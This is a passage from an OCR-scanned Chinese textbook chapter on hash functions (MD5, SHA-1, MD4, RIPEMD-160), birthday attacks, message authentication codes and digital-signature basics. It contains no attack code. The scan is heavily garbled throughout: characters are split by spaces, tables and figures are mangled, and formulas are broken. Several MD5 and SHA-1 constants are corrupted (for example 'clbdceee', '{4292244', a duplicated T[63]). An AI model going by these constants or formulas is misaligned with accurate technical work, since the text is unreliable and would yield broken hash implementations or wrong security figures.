4 轮 压缩 时 的 变化 如 表 4. 2 所 示 , 了 [站 的 值 在 4 轮 压缩 时 的 变化 如 表 4. 3 所 示 。 


表 4.1 逻辑 函数 表 
轮 基本 函数 g g(bsc,d) 
fr Fl(bscsd) GAOV ToANd) 
fe Gbscsd) (ADV (eA Td) 
fn H(b,csd) bAcMd 
fi I(bscsd) c A(bV Td) 


CLS, 的 功能 是 在 分 别 与 X[k]、T[] 模 加 后 对 存储 器 中 的 32 位 字 进 行 循环 左 移 ; 位 ,s 
值 第 1 轮 分 别 为 7.12、17、22; 第 2 轮 为 5.9、14、20; 第 3 轮 为 4.11、16、23; 第 4 轮 为 6、10、 
15.21。 


表 4.2 当前 分 组 的 第 天 个 32 位 的 字 表 


第 1 轮 | X[0] |X[1] | X[2] | X[3] | X[4]| X[5] | X[6] | X[7]| XC[8] | XC9] IXLloIXLI]JIXC2]IXL13]IXLL4]IXL15] 
第 2 轮 | X[1] | X[6] IX[11]| X[0] | X[5] IXC10]IX[15]| X[4] | XC[9] |XC14]| XC3] | XC8] |XC13]| XC2] | XC[7] |X[12] 
第 3 轮 | X[5] | X[8] IX[11]IX[14]| X[1] | X[4] | X[7] |/X[10JIX[13]| X[0] | X[3] | X[6] | X[9] 区 [12]IXC15]| XL2] 
第 4 轮 | X[0] | X[7] X[14]| XC5] |X[12]|i X[3] |X[10]| X[1] | X[8] IXC15]| XC6] |XC13] XL4] IXC11]| X[2] | XC9] 
表 4.3 4 轮 压缩 中 了 [ 门 的 值 表 
T[1]= d76aa478 T[17]= f61e2562 T[33]= fffa3942 T[49]= {4292244 
T[2]= e8c7b756 T[18]= c040b340 T[34]= 8771f681 T[50]= 432aff97 
T[3]= 242070db T[19]= 265e5a51 T[35]= 6d9d6122 T[51]= ab9423a7 
T[4]= clbdceee T[20]= e9b6c7aa T[36]= fde5380c T[52]= fc93a039 
T[5]= f57c0faf T[21]= d62f105d T[37]= a4beea44 T[53]= 655b59c3 
T[6]= 4787c62a T[22]= 02441453 T[38]= 4bdecfa9 T[54]= 8foccc92 
T[7]= a8304613 T[23]= d8ale681 T[39]= f6bb4b60 T[55]= ffeff47d 
T[8]= fd469501 T[24]= e7d3fbc8 T[40]= bebfbc70 TL56]= 85845ddl 
T[9]= 698098d8 T[25]= 21elcde6 T[41]= 289b7ec6 T[57]= 6fa87e4f 
T[10]= 8b44f7af T[26]= c33707d6 T[42]= eaal27fa T[58]= fe2ce6e0 
T[11]= {fff5bbl T[27]= ftd50d87 T[43]= d4ef3085 T[59]= a3014314 
T[12]= 895cd7be T[28]= 455al4ed T[44]= 04881d05 TL60]= 4e0811al 
T[13]= 6b901122 T[29]= age3e905 T[45]= d9d4d039 T[61]= {7537e82 
T[14]= fd987193 T[30]= fcefa3f8 T[46]= e6db99e5 T[62]= bd3af235 
T[15]= a679438e T[31]= 676f02d9 T[47]= 1fa27cf8 T[63]= 2ad7d2bb 
T[16]= 49b40821 T[32]= 8d2a4c8a T[48]= cdac5665 T[63]= eb86d391 


5. 输出 散 列 值 

所 有 的 N 个 分 组 消息 都 处 理 完 后 ,最 后 一 轮 得 到 的 4 个 缓冲 区 的 值 即 为 整个 消息 的 散 
列 值 128 位 。 

6. MDS5 的 安全 性 一 一 碰撞 

对 于 给 定 的 Hash 函数 h(x) 和 两 个 输入 串 rz、y(Cz 天 y) ,如 果 有 (rz) 二 h(y), 则 称 这 两 个 
串 是 一 个 Hash 碰撞 (Collision) 。Hash 函数 必 有 一 个 输出 串 对 应 无 穷 多 个 输入 串 ,因此 碰 
撞 是 必然 存在 的 。 

MD5 的 输出 为 128 位 ,对 于 给 定 的 MD5 值 ,强力 攻击 寻找 具有 相同 值 的 一 个 消息 , 计 
算 困 难 性 为 2 , 若 每 秒 可 测试 1 000 000 000 个 消息 需 用 1.07X10* 年 。 如 果 采 用 生日 攻 
击 法 , 找 出 具有 相同 杂凑 值 的 两 个 消息 需 执行 2* 次 运算 。 

2004 年 8 月 ,在 美国 召开 的 国际 密码 学 会 议 (Crypto'2004) 上 ,王小云 教授 给 出 破解 
MD5 算法 的 报告 ,提出 了 一 个 非常 高 效 的 寻找 碰撞 的 方法 ,可 以 在 数 个 小 时 内 找到 MD5 的 
碰撞 。MD5 算法 的 抗 密码 分 析 能 力 弱 ,不 应 当 再 使 用 。 
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Berson 的 研究 表明 ,对 单 循环 MD5 ,使 用 不 同 的 密码 分 析 可 能 在 合理 的 时 间 内 找 出 能 
够 产生 相同 摘要 的 两 个 报 文 , 这 个 结果 被 证 明 对 4 个 循环 中 的 任意 一 个 循环 也 成 立 , 但 作者 
没有 能 够 提出 如 何 攻击 包含 全 部 4 个 循环 MD5 的 攻击 ;Boer 和 Bosselaers 的 研究 显示 了 
即使 缓存 ABCD 不 同 , MD5 对 单个 512 位 分 组 的 执行 也 将 得 到 相同 的 输出 ( 伪 冲 突 ); 
Dobbertin 的 攻击 技术 使 MD5 的 压缩 函数 产生 冲突 , 即 寻 找 3x,y, zx 关 y, 但 H(zx)= 
H(Xs 

由 此 ,MD5 被 认为 是 易 受 攻击 的 ,逐渐 被 SHA-1 和 RIPEMD-160 替代 。 


4.2.4 SHA 算法 


SHA 算法 是 美国 的 NIST 和 NSA 设计 的 一 种 标准 哈 希 算法 (Security Hash 
Algorithm,，SHA) ,用 于 数字 签名 的 标准 算法 DSS 中 ,1993 年 成 为 联邦 信息 处 理 标准 
(FIPS PUB 180)。 它 基于 MD4 算法 ,与 之 非常 类 似 。 与 MD 一 4 相 比 较 ,主要 是 增加 了 扩 
展 变换 ,将 前 一 轮 的 输出 加 到 下 一 轮 ,这样 增加 了 bit 混淆 的 雪崩 效 应 ;输入 为 小 于 2* 位 长 
的 任意 消息 ,分 组 512 位 长 ,输出 160 位 ,对 穷 举 攻击 更 有 抵抗 力 。 

1. 算法 描述 

消息 填充 与 MD5 完全 相同 ,附加 消息 长 度 为 64 位 。 缓 冲 区 有 5 个 ,初始 化 : 

A= 67452301， B= EFCDAB89, C= 98BADCFB， 
D = 10325476， E = C3D2E1F0 
分 组 处 理 如 图 4. 6 所 示 ,其 中 十 为 模 22 加 。 


六 [a 


> 4 BI cl Dl El 


A BI ch pI El 


cl of A 


Ai st ci pi El 


CV 


qrl 


图 4.6 SHA-1 算 法 
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2. SHA-1 压缩 函数 ( 单 步 ) 
单 步 压缩 更 新 A.B.C、.D、E 缓冲 区 ,方法 与 MD5 相 比 有 很 大 改变 。 如 图 4. 7 所 示 。 
其 中 ,基本 逻辑 函数 /输入 同样 为 B.C、D 缓冲 区 的 值 ,定义 如 表 4.4 所 示 。 


| B C D E 


图 4.7 压缩 函数 的 单 步 迭 代 


表 4.4 逻辑 函数 表 
轮 基本 函数 函 数 值 
1 f1(B,C,D) (BAOV(B- AD) 
2 fi(BiC DD BOCOD 
3 fs(B.C,D) (BAOV (BAD)V (CAD) 
4 fi(B,C,D) BO@COD 


32 位 的 变量 循环 左 移 指定 为 5 位 (CLSs) 和 30 位 (CLSs,。)。W, 是 从 当前 512 位 输入 分 
组 导出 的 32 位 字 , 如 图 4.8 所 示 , 前 16 个 值 ( 即 W。 ,Wi,… ,Wis) 直 接 取 为 输入 分 组 的 16 
个 相应 的 字 , 其 余 值 ( 即 Wis,W ,… ,Ws) 取 为 W, 二 CLS1 (Wi1 吕 Wi: 加 Ws 中 W,_;)， 
其 中 外 表示 异 或 。 


512 位 Wo jj Ws Wi We Wia Wg Ws Wes Wes WW We 


I bl 


7 | 


了 


1 i111 1 1 
(xor ) ( xor ) ( xor ) 
1 1 1 
(crs') (CLs, ) ( Crs ) 
站 
Jo Wm Eo W's | We 2 3 


图 4.8 压缩 中 的 W[ 本 导出 值 


而 K, 是 加 法 常量 ,其 值 如 表 4.5 所 示 。 
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表 4.5 不 同步 骤 中 的 加 法 常量 K 值 表 


步 台 十 六 进 制 步 又 十 六 进 制 
0<1<19 K,=5A827999 40<1<59 K, =8F1BBCDC 
20<1<39 K,=6ED9EBAl 60<1<79 K,=CA62C1D6 


3. SHA 与 MD5 的 比较 

抗 穷 举 搜索 能 力 比 较 : 对 于 寻找 指定 Hash 值 , SHA 复杂 度 为 0(2160) ,MD5 复杂 度 
为 0(2128) ;对 于 生日 攻击 ,SHA 复杂 度 为 0(280) ,MD5 复杂 度 为 0(264)。 抗 密码 分 析 
攻击 的 强度 SHA 似乎 高 于 MD5。 计 算 速度 上 SHA 明显 较 MD5 慢 , 但 简捷 与 紧 致 性 描述 
两 者 都 比较 简单 ,都 不 需要 大 的 程序 和 代 换 表 。 

4. SHA 安全 性 

2005 年 2 月 15 日 ,在 美国 召开 的 国际 信息 安全 RSA 研讨 会 上 ,山东 大 学 王小云 的 论 
文 证 明 SHA-1 在 理论 上 也 被 破解 。 她 证 明了 160 位 SHA-1, 只 需要 大 约 269 次 计算 就 能 
找 出 来 ,而 理论 值 是 280 次 。 


4.2.5 其 他 Hash 算法 


MD4 对 输入 消息 ,算法 产生 128- 位 散 列 值 。MD4 算法 使 用 三 轮 运算 ,每 轮 16 步 , 比 
MD5 少 1 轮 。MD4 的 第 一 轮 没有 使 用 加 法 常量 ,第 二 轮 和 第 三 轮 运算 中 每 步 迭 代 都 使 用 
相同 的 加 法 常量 ,但 不 同 轮 的 加 法 常量 不 同 。MD4 使 用 三 个 基本 逻辑 函数 , 比 MD5 少 1 
个 。MD4 中 每 步 迭 代 的 结果 不 与 前 一 步 的 结果 相 加 。 输 出 128 位 。 

MD4 的 设计 目标 是 : 

(1) 安全 性 。 找 到 两 个 具有 相同 散 列 值 的 消息 在 计算 上 不 可 行 ,不 存在 比 穷 举 攻击 更 
有 效 的 攻击 。 

(2) 直接 安全 性 。MD4 的 安全 性 不 基于 任何 假设 ,如 因子 分 解 的 难度 。 

(3) 计算 速度 。MD4 适用 于 软件 实现 ,具有 基于 32 位 操作 数 的 一 些 简单 位 操作 。 

(4) 简单 性 和 紧凑 性 。MD4 尽 可 能 简单 ,没有 大 的 数据 结构 和 复杂 的 程序 了 。 

(5) 有 利 的 Little-Endian 结构 。MD4 最 适合 微 处 理 器 结构 ,更 大 型 .速度 更 快 的 计算 
机 要 做 必要 的 转化 。 

RIPEMD-160 由 欧 共 体 RIPE 项 目 组 研制 。 输入 可 以 是 任意 长 的 报 文 , 按 512 位 分 组 ， 
以 分 组 为 单位 处 理 。 输 出 160 位 摘要 。 算 法 的 核心 是 具有 10 轮 运算 的 模块 ,10 轮 运算 分 
成 两 组 ,每 组 5 轮 ,每 轮 16 步 迭代 。MD5 .SHA 算法 的 比较 如 表 4.6 所 示 。 


表 4.6 算法 比较 

MD5 SHA-1l RIPEMD-160 
输出 摘要 长 度 128 位 160 位 160 位 
基本 处 理 单位 512 位 512 位 512 位 
步 数 64(4 of 16) 80(4 of 20) 160(5 paired of 16) 
最 大 消息 长 度 无 限 264-1 位 264-1 位 
基本 逻辑 函数 4 4 5 
加 法 常数 64 4 9 
Endianness Little-endian Big-endian Little-endian 


148 


信息 认证 技术 


4.2.6 对 Hash 函数 的 攻击 


对 一 个 Hash 算法 的 攻击 可 分 三 个 级 别 , 即 预 映射 攻击 (Preimage Attack) ,次 预 映射 攻 
击 (Second Preimage Attack) 和 碰撞 攻击 (Collision Attack)。 

预 映射 攻击 是 给 定 Hash 值 ,找到 其 所 对 应 的 明文 M, 使 得 Hash(M) = 一。 这 种 攻击 
是 最 彻底 的 ,也 称 为 穷 举 攻击 , 它 需 要 预先 知道 是 何 种 Hash 算法 。 如 果 一 个 Hash 算法 被 
人 找 出 预 映 射 , 那 这 种 算法 是 不 能 使 用 的 。 

次 预 映射 攻击 是 给 定 明文 M ,找到 另 一 个 明文 M: (Mi 隆 M) ,使 得 Hash(M ) 王 Hash 
(M: )。 这 种 攻击 也 需要 预先 知道 Hash 算法 ,因此 得 知 Mi 的 Hash 值 ,其 实 就 是 要 寻找 一 
个 弱 碰 撞 。 

碰撞 攻击 是 随机 找到 M, 和 M ,使 得 Hash(CM,)= Hash(CM: )。 这 种 攻击 其 实 就 是 在 
已 知 Hash 算法 中 寻找 一 个 强 碰 撞 , 也 称 为 “生日 攻击 ”。 

生日 攻击 的 基本 观点 来 自 于 生日 问题 : 在 一 个 教室 里 最 少 有 多 少 学 生 时 ,可 使 得 在 这 
个 教室 里 至 少 有 两 个 学 生 的 生日 在 同一 天 的 概率 不 小 于 50%? 这 个 问题 的 答案 是 23 。 

概率 结果 与 人 的 直觉 是 相 违 背 的 ,形成 生日 悖 论 。 这 种 攻击 不 涉及 杂 竣 算法 的 结构 ,可 
用 于 攻击 任何 杂凑 算法 。 目 前 为 止 ,能 抗击 生日 攻击 的 杂凑 值 至 少 要 达到 128 位 。 

给 定 一 个 散 列 函数 也 和 某 Hash 值 H(zx) ,假定 五 有 7 个 可 能 的 输出 。 如 果 互 有 个 
随机 输入 , & 必须 为 多 大 才能 至 少 存在 一 个 输入 y ,使 得 H(y) 二 H(z) 的 概率 大 于 0. 5。 

给 定 两 个 集合 X 和 YY, 每 个 集合 有 上 个 元 素 : 

Ks{Tiszes Ts 了; {yi19 ya 9 ye) 

其 中 ,各 元 素 的 取 值 是 1~n 之 间 均 匀 分 布 的 随机 值 (二 n) ,那么 这 两 个 集合 中 至 少 有 
一 个 元 素 相同 (重复 ) 的 概率 R(n,k) 是 多 少 呢 ? 

给 定 zi ,那么 一 za 的 概率 为 1/n, 所 以 yi 取 zi 的 概率 为 1 一 1/n, 那 么 Y 中 的 个 值 
都 不 等 于 zi 的 概率 为 (1 一 1/n)" ;给 定 zz ,那么 了 中 的 & 个 值 都 不 等 于 zs 的 概率 为 (1 一 1/ 
n)*; 同 理 , 给 定 zt 那么 立 中 的 & 个 值 都 不 等 于 zx 的 概率 为 (1 一 1/n)*。 所 以 ,Y 中 没有 元 
素 与 X 中 元 素 相同 的 概率 为 ， 

i 好 
St = lg) 
那么 , Y 中 至 少 有 一 个 元 素 与 X 中 元 素 相同 的 概率 为 : 


WN 
R(n,k)=1— (1 -] 
n 


根据 不 等 式 (1 一 +) 三 e-*(x 写 0), 当 x 了 0 时 ,(1 一 7z) 污 e 7, 可 知 : 
1 1 
(3j< eo (a>0) sli=3] < (er) 


n 
。 Ee 1 
Rb) =I- 人 1- 二 ] 二 1 一 (e™) 
有 2 
当 1 一 人 人“ 三 0.5 R(t) >0.5 


k= Vnln2 
所 以 Rs*1.17 sqrt(n)。 
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如 果 X 是 一 个 教室 中 所 有 学 生 的 集合 ,Y 是 一 个 非 闽 年 的 365 天 的 集合 ,h(x) 表 示 学 
生 工 的 生日 ,这 时 xz 一 365,e 王 0.5, 由 &sz1.17 sqrt(z) 可 知 ,&sz22.3, 取 整 为 23 人 。 

结论 : 如 果 Hash 码 为 m 位, 则 有 2” 个 可 能 的 Hash 码 ; 如 果 给 定 / 王 瓦 CX) ,要 想 找 到 
一 个 y, 使 HH(y)=h 的 概率 为 0.5, 则 要 进行 多 次 的 尝试 ,尝试 的 次 数 & 王 2"/12 一 2" 。 所 
以 ,对 于 一 个 使 用 64 位 的 Hash 码 ,攻击 者 要 想 找到 满足 HOM ) 王 五 (M) 的 M' 来 替代 M， 
平均 来 讲 要 找到 这 样 的 消息 大 约 要 进行 2” 次 尝试 。 但是,“ 生日 攻击 ” 却 可 以 大 大 减 小 尝试 
的 次 数 ,对 于 64 位 的 Hash 码 , 所 需 付出 的 代价 仅 为 1.17X2* 次 。 

例如 , 设 M 和 Hash 算法 生成 64 位 的 Hash 值 ,攻击 者 可 以 根据 M 产生 22 个 表达 相同 
含义 的 变 式 ( 例 如 在 词 与 词 之 间 多 加 一 个 空格 ); 同时 准备 好 伪造 的 消息 M' 产 生 2 个 表达 
相同 含义 的 变 式 。 在 这 两 个 集合 中 , 找 出 产生 相同 Hash 码 的 一 对 消息 M, 和 Mi 。 根 据 生 
日 悖 论 ,找到 这 样 一 对 消息 的 概率 大 于 0. 5。 

现实 生活 中 ,A 准备 两 份 合同 M 和 M“ ,一 份 B 会 同意 ,一 份 会 取 走 他 的 财产 而 被 拒绝 。 
A 对 M 和 M' 各 做 32 处 微小 变化 (保持 原意 ) ,分 别 产生 2* 个 64 位 Hash 值 。 根 据 前 面 的 
结论 ,超过 0. 5 的 概率 能 找到 一 个 M 和 一 个 M'“ ,它们 的 Hash 值 相 同 。A 提交 M 给 B, 经 BB 
审阅 后 产生 64 位 Hash 值 并 对 该 值 签名 ,返回 给 A。A 用 M “替换 M 。 

电话 掷 币 的 例子 : 两 个 朋友 Alice 和 Bob 想 在 晚上 一 起 外 出 ,但 是 定 不 下 来 是 去 电影 
院 还 是 歌剧 院 。 于 是 ,他 们 达成 了 一 个 通过 撞 硬 币 来 决定 的 协议 。Alice 拿 着 硬币 对 Bob 
说 :“ 你 选择 一 面 , 我 来 抛 .”Bob 选择 后 , Alice 把 硬币 抛 向 空中 。 然 后 他 们 都 注视 硬币 ,如 
果 Bob 选择 的 那 一 面 朝 上 , 则 他 可 以 决定 要 去 的 地 方 ,否则 由 Alice 决定。 假如 两 人 在 电话 
两 端 ,如 何 模拟 掷 币 来 公平 决定 某 个 事情 或 取得 决定 权 ? 这 就 是 电话 掷 币 的 例子 。 

如 图 4. 9 所 示 ,可 以 考虑 引入 一 个 函数 ,暂时 称 它 为 奇妙 函数 , 它 具 有 下 面 的 特点 : 对 
于 任意 整数 x, 由 zz 计算 f(z) 是 容易 的 ,而 给 出 F(Cz) 计 算 zx 是 不 可 能 的 , 即 不 可 能 找 出 一 
对 整数 (z,y), 满足 xz 关 y 且 f(x) 三 f(y)。 两 个 朋友 达成 一 致 ,决定 使 用 奇妙 函数 广 用 偶 
数 表示 正面 ,用 奇数 表示 反面 。Alice 任意 选择 一 个 大 随机 数 x 并 且 计 算 /(x), 然后 通过 
电话 告诉 Bob /(x) 的 值 ;Bob 告诉 Alice 自己 对 zx 的 奇偶 性 猜测 。Alice 告诉 Bob 她 选择 的 
z 的 值 ,Bob 验证 /(x) ,并 查看 他 的 猜测 是 否 正确 。 


2 


Alice 
随机 选择 一 个 整数 M 
| 文本 块 A 
H tl, Bob 
M 网 后 本 误区 H(M) 


图 4.9 Hash 函数 的 应 用 


4.2.7 消息 认证 码 
消息 认证 码 (Message Authentication Code，MAC) ,也 称 为 消息 摘要 ,数字 指纹 或 密码 
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检验 和 (Cryptographic Checksum) ,是 在 一 个 密 钥 的 控制 下 将 任意 长 的 消息 映射 到 一 个 简 
短 的 定 长 数据 分 组 ,并 将 它 附加 在 消息 后 。 
MAC=F(K,M) 
其 中 ,K 为 共享 密 钥 ,F 为 函数 ,M 为 消息 。 
认证 码 也 可 以 是 不 带 密 钥 的 Hash 函数 ,下 面 介绍 几 种 认证 码 的 算法 。 
. 二 次 同 余 操作 探测 码 (QCMDC) 的 算法 
假设 M 是 需要 发 送 和 验证 的 消息 ,K 是 安全 密 钥 ,首先 将 消息 M 分 组 ,每 组 对 位 ,对 应 
的 序列 为 Mi ,那么 产生 的 验证 序列 为 : 
H;= (H;+M;)’* modp 
其 中 Ho 二 &, p 是 小 于 2"! 的 素数 。 
QCMDC 认证 码 是 一 个 很 好 的 认证 实现 ,不 过 目前 该 算法 已 经 被 攻破 。 
2. IBC-Hash 的 算法 
假设 M 是 需要 发 送 和 验证 的 消息 ,p 和 w 是 安全 密 钥 对 ,首先 将 消息 M 分 组 ,每 组 
位 ,对 应 的 序列 为 Mi; ,那么 产生 的 验证 序列 为 : 
H; = (Mi mod 户 十 v) mod 2" 
其 中 p 是 小 于 nn 的 素数 ,v 是 小 于 2" 的 素数 。 
算法 中 的 每 条 消息 都 要 用 不 同 的 密 钥 做 散 列 计算 ,因此 算法 的 安全 性 受到 密 钥 对 长 度 
的 制约 。 实 现 上 仅 用 于 发 送 长 而 不 经 常用 的 消息 。 
3. 信息 鉴别 算法 
信息 鉴别 算法 是 一 个 ISO 标准 。 假 设 M 是 需要 发 送 和 验证 的 消息 ,zw 和 w 是 变量 ,由 
密 钥 决定 。 首 先 将 消息 M 分 组 ,每 组 位 ,对 应 的 序列 为 Mi ,那么 产生 的 验证 序列 为 
v=v<l 
e=v@w 
r=((((et+y) mod 2*)V AAC)X((rOM)) mod22 一 1 
y= ((((et+zx) mod 2*) V BAD) Xr@M)) mod22 一 2 
其 中 A、B.C.D 是 常数 ,<<<j 表示 向 左 移 j 位 ,由 表示 异 或 。 


4.3 数字 签名 


在 传统 的 以 纸 质 材料 书面 文件 为 基础 的 事物 处 理 中 ,采用 书面 签名 的 形式 ,如 手 签 . 手 
印 和 印章 等 。 签 名 起 到 确认 核准、 生效 和 负责 任 等 多 种 作用 。 书 面 签名 得 到 司法 部 门 的 支 
持 , 具 有 一 定 的 法 律 意义 。 

随 着 计算 机 网 络 技术 的 发 展 ,在 以 计算 机 文件 为 基础 的 现代 事物 处 理 中 ,人 们 需要 通过 
网 络 信息 传输 对 电子 的 文件 ,契约 、 合 同 、 信 件 和 账单 等 进行 数字 签名 以 替代 手写 签名 。 签 
名 是 证 明 当事人 的 身份 和 数据 真实 性 的 一 种 信息 。 


4.3.1 基本 概念 


数字 签名 (Digital Signature) 是 以 密码 学 的 方法 对 数据 文件 产生 的 一 组 代表 签名 者 身 
份 和 数据 完整 性 的 数据 信息 。 它 提供 了 一 种 电子 形式 的 签名 和 鉴别 方法 ,以 解决 伪造 、 抵 赖 
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和 冒充 等 问题 。 

数字 签名 就 是 给 消息 一 个 可 以 核实 或 鉴别 的 标识 ,是 实现 认证 的 重要 工具 。 一 个 信息 
的 数字 签名 实际 上 是 一 个 数 , 它 仅仅 依赖 于 签名 者 的 密 钥 和 被 签名 的 消息 。 数 字 签 名 的 目 
的 是 提供 一 种 手段 ,使 得 一 个 实体 把 它 的 身份 与 某 个 信息 捆绑 在 一 起 。 

数字 签名 在 身份 认证 ,数据 完整 性 ,不 可 否认 性 以 及 匿名 性 等 方面 有 重要 应 用 ,特别 是 
在 大 型 网 络 安全 通信 中 的 密 钥 分 配 、. 认 证 以 及 电子 商务 系统 中 具有 重要 作用 。 在 网 络 中 进 
行 数据 传输 ,必须 保证 接收 到 的 消息 的 真实 性 (的 确 是 由 它 所 声称 的 实体 发 来 的 ) 、 完 整 性 
(未 被 算 改 、 插 入、 删除 )、 顺 序 性 (未 重 排 重 放 ) 和 时 间 性 。 数 字 签名 用 来 鉴别 下 列 威胁 : 

。 否认 。 发 送 者 事后 不 承认 已 发 送 过 的 文件 ; 

。 伪造 。 接 收 者 伪造 一 份 来 自发 送 者 的 文件 ; 

。 自 改 。 接 收 者 私自 修改 接收 到 的 文件 ; 

。 冒充 。 网 络 中 某 一 用 户 冒 充 发 送 者 或 接收 者 。 

1. 数字 签名 原理 

消息 发 送 方 对 要 发 送 的 原始 报 文通 过 哈 希 算法 生成 一 个 固定 长 度 的 字符 串 , 称 为 报 文 
摘要 ,并 确保 不 同 的 报 文 所 得 到 的 摘要 不 同 , 而 相同 的 报 文生 成 的 摘要 是 唯一 的 。 发 送 方 用 
自己 的 私有 密 钥 对 报 文摘 要 进行 加 密 来 形成 发 送 方 的 数字 签名 。 

发 送 方 将 数字 签名 作为 报 文 的 附件 和 报 文 一 起 发 送 给 接收 方 。 接 收 方 首先 从 收 到 的 原 
始 报 文中 用 同样 的 算法 计算 新 的 报 文摘 要 ,再 用 发 送 方 的 公 钥 对 报 文 附件 的 数字 签名 进行 
解密 ,比较 两 个 报 文 摘要 ,如 果 相 同 ,接收 方 就 可 以 确认 该 签名 是 发 送 方 的 。 

该 过 程 既 认证 了 消息 的 完整 性 ,又 通过 公 钥 密 钥 体制 认证 了 发 送 方 的 身份 。 如 图 4. 10 
所 示 。 


发 方 A 收 方 B 
消息 
1 
T -一 = 消息 | 移 - 消息 
和 -| 窒 名 
消息 摘要 SN | 


| 加 密 的 消息 解 
搞 要 


密 算法 
加 密 算法 | 
| SN 
私 钥 A 公 钥 A 


图 4.10 数字 签名 原理 


2. 数字 签名 算法 描述 

一 个 数字 签名 体制 是 满足 以 下 条 件 的 五 元 组 (M,C,K,S,V): 

。 消息 空间 M: 由 所 有 任意 长 度 消息 组 成 的 集合 , MA” ; 

。 签名 空间 C: 由 所 有 签名 组 成 的 集合 ,C 二 Ui<;<,A ,每 个 签名 长 度 不 超过 n; 
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。 密 钥 空间 K: 签名 算法 S 需要 用 到 的 密 钥 ,可 能 包括 公 钥 和 私 钥 ; 
。 签名 算法 S: 任 给 &EK,SiggES, 有 Sigs(M) 一 C,Sigs 称 为 签名 算法 (Signing 
Algorithm); 
。 验证 算法 V: 任 给 kE K,Ver: EV, 有 Ver (M,C) 一 { 真 , 假 }, Ver, 称 为 验证 算法 
(Verification Algorithm)。 
任 给 kEK, Sigs ES, Ver; EV, 消息 TEM,yEC, 有 Veri(zxsyy)= 二 { 真 (y= Sigi (x))， 
假 (y -Sigi (y))}。 
任 给 消息 zEM,y=Sigs(z)EC, 则 将 数据 对 (z,y) 称 为 消息 x 的 一 个 数字 签名 ,或 直 
接 把 y 称 为 消息 x 的 数字 签名 。 
3. 数字 签名 基本 要 求 
对 每 一 个 密 钥 K，Sigs 和 Ver; 应 该 是 多 项 式 时 间 函 数 ,Ver 是 公开 的 函数 ,而 Sig, 是 
保密 的 。 给 定 一 个 消息 z, 除 了 发 送 者 本 人 以 外 ,任何 其 他 人 找到 满足 Ver; (zx,y) 为 真 的 数 
字 签 名 y, 应 该 是 计算 上 不 可 行 的 。 如 果 攻击 者 能 够 找到 满足 Ver, (xz,y) 的 数据 对 (z,y)， 
而 发 送 者 事先 又 没有 对 zx 签名 , 则 称 y 是 伪造 (Forgery) 的 数字 签名 。 
4. 数字 签名 的 特性 
数字 签名 和 手写 签名 比较 如 表 4.7 所 示 。 


表 4.7 数字 签名 和 手写 签名 比较 


| 不 同文 件 | 。。 | 与 被 入 和 
特 征 | 。 存在 形式 | 人 复制 | 他 天 二 文 | 验 证 | 伪造 
手写 | 可 视 书写 | 所 答 文 件 的 物理 | 不 变 或 变 | | 与 标准 签名 | 
签名 “| 笔迹 | 组 成 部 分 化 小 不 易 | 1 = | 笔 训 比较 “| 比较 容易 
数字 | 与 所 签 文件 拥 | 。 网 | 公开 的 验 
站 | 数字 中 | 下 变化 大 | 容易 111 。 | 全 末 直 办 | 十 分 天 难 


数字 签名 具有 如 下 特性 : 

签名 能 够 用 于 证 实 签名 者 的 身份 ,签名 日 期 和 时 间 。 

签名 能 用 于 证 实 被 签 消息 的 内 容 。 

签名 是 可 信 的 。 任 何人 都 可 以 方便 地 验证 签名 的 有 效 性 。 

签名 是 不 可 伪造 的 。 除 了 合法 的 签名 者 之 外 ,任何 其 他 人 伪造 其 签名 是 困难 的 ,这 
种 困难 性 指 实现 时 计算 上 是 不 可 行 的 。 

签名 是 不 可 重用 的 。 对 一 个 消息 的 签名 不 能 通过 复制 变 为 男 一 个 消息 的 签名 。 如 
果 一 个 消息 的 签名 是 从 别处 复制 的 , 则 任何 人 都 可 以 发 现 消息 与 签名 之 间 的 不 一 致 
性 ,从 而 可 以 拒绝 签名 的 消息 。 

签名 的 消息 是 不 可 改变 的 。 经 签名 的 消息 不 能 被 自 改 。 一 旦 签名 的 消息 被 算 改 , 则 
任何 人 都 可 以 发 现 消息 与 签名 之 间 的 不 一 致 性 。 

签名 是 不 可 抵赖 的 。 签 名 者 不 能 否认 自己 的 签名 。 

依赖 性 。 数 字 签 名 必须 依赖 于 要 签名 的 消息 的 位 模式 。 

仲裁 性 。 当 通信 双方 为 签名 真 伪 发 生 争执 时 ,可 以 由 第 三 方 验证 解决 争端 。 
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5. 数字 签名 分 类 

按照 不 同 的 分 类 方式 可 以 对 数字 签名 进行 不 同 的 分 类 

(1) 按照 数学 原理 可 分 为 基于 离散 对 数 的 签名 和 基于 素 因子 分 解 的 签名 。 

(2) 按照 签名 用 户 可 分 为 单个 用 户 签名 和 多 个 用 户 签名 。 

(3) 按照 消息 恢复 特性 可 分 为 不 具有 自动 恢复 的 数字 签名 和 具有 自动 恢复 的 数字 
签名 。 

(4) 按照 签名 实现 可 分 为 直接 和 需 仲 裁 的 数字 签名 。 

(5) 按照 签名 功能 可 分 为 普通 数字 签名 和 特殊 数字 签名 。 特 殊 数 字 签 名 主要 包括 育 签 
名 、 双 (多 ) 重 签名 、 群 签名 .门限 签名 .代理 签名 .门限 代理 签名 和 不 可 和 否认 的 门限 代理 签名 
等 签名 方案 。 

6. 数字 签名 的 攻击 

按照 拥有 密 钥 或 消息 的 条 件 对 数字 签名 的 攻击 为 : 

。 唯 密 钥 攻 击 。 攻 击 者 只 有 用 户 公开 的 密 钥 。 

。 已 知 消息 攻击 。 攻 击 者 拥有 一 些 消息 的 合法 签名 ,但 是 消息 不 由 他 选择 。 

。 选择 消息 攻击 。 攻 击 者 可 以 自由 选择 消息 并 获取 消息 的 签名 。 

对 数字 签名 攻击 的 结果 有 : 完全 破译 (攻击 者 恢复 出 用 户 的 密 钥 ) .一 致 伪造 (攻击 者 对 
于 任意 消息 可 以 伪造 其 签名 ) .选择 性 伪造 (攻击 者 可 以 对 一 个 自己 选取 的 消息 伪造 签名 ) 和 
存在 性 伪造 (攻击 者 可 以 生成 一 些 消息 的 签名 ,但 在 伪造 前 对 该 消息 一 无 所 知 ) 等 。 


4.3.2 ”杂凑 函数 的 数字 签名 


1. 基于 Hash 函数 和 单 钥 密码 算法 的 数字 签名 

发 送 方 将 消息 工 经 Hash 运算 后 ,再 将 摘要 用 对 称 密 钥 K 加 密 得 到 加 密 签名 zi ,与 原 
始 消息 zx 合并 传输 给 接收 方 ,接收 方 对 zx: 用 K 解密 还 原 摘要 ,同时 与 对 x 计算 Hash 摘要 
值 比较 来 检验 签名 ,如 图 4. 11 所 示 。 


发 送 方 接收 方 


四 : 站 | 
L-O 一 一 


el | 


O-®© 5 
tx 人 


